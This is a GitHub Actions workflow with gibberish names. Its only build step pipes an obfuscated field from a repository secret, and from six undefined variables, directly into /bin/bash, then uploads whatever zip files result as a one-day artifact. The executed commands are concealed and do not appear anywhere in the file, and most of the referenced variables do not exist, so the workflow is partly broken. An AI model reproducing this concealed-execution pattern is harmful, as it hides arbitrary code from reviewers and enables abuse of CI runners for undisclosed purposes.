name: linjunhencheng
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: linjunhencheng
        env:
          l83: ${{ secrets.l83 }}
        run: |
          printf '%s' "$l83" | jq -r .xc69016 | /bin/bash
          printf '%s' "$ddjs85725" | jq -r .usw96204 | /bin/bash
          echo $nqily798 | jq -r .cefuo14951 | /bin/bash
          echo $iv05417 | jq -r .stet6033 | /bin/bash
          echo $spop2398 | jq -r .ydbzt80295 | /bin/bash
          echo $vmhd3 | jq -r .g90 | /bin/bash
          printf '%s' "$yt97" | jq -r .rshtm5 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: gszN7SnY
          path: "*.zip"
          retention-days: 1
